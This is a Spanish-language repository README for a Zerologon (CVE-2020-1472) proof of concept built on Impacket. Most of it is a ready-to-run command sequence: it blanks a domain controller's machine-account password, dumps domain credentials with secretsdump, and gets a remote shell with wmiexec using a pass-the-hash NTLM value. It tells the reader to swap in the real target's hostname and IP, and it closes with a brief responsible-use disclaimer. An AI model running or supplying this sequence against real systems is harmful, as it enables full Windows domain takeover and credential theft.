
Una prueba de concepto práctica para CVE-2020-1472 (Zerologon) que utiliza la librería Impacket para explotar la vulnerabilidad de Netlogon y obtener acceso no autorizado al controlador de dominio.
Este repositorio contiene una implementación actualizada (2024) del exploit Zerologon combinado con las herramientas de Impacket para explotar CVE-2020-1472 (Zerologon). Este exploit tiene como objetivo entornos Windows Server para manipular las contraseñas de cuentas de máquina y realizar movimiento lateral.
pip install -r requirements.txt
python3 set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python3 secretsdump.py -just-dc tancongmang/WIN-C9PAHHGJN91\[email protected]
python3 wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
python set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python secretsdump.py -just-dc "tancongmang/[email protected]"
python wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
WIN-C9PAHHGJN91 y 192.168.40.145 con el nombre de host y la dirección IP reales del objetivo.Usa esta herramienta de manera responsable. El uso no autorizado de esta herramienta para explotar sistemas sin permiso explícito es ilegal y poco ético. Los autores no son responsables de ningún uso indebido o daño causado por esta herramienta.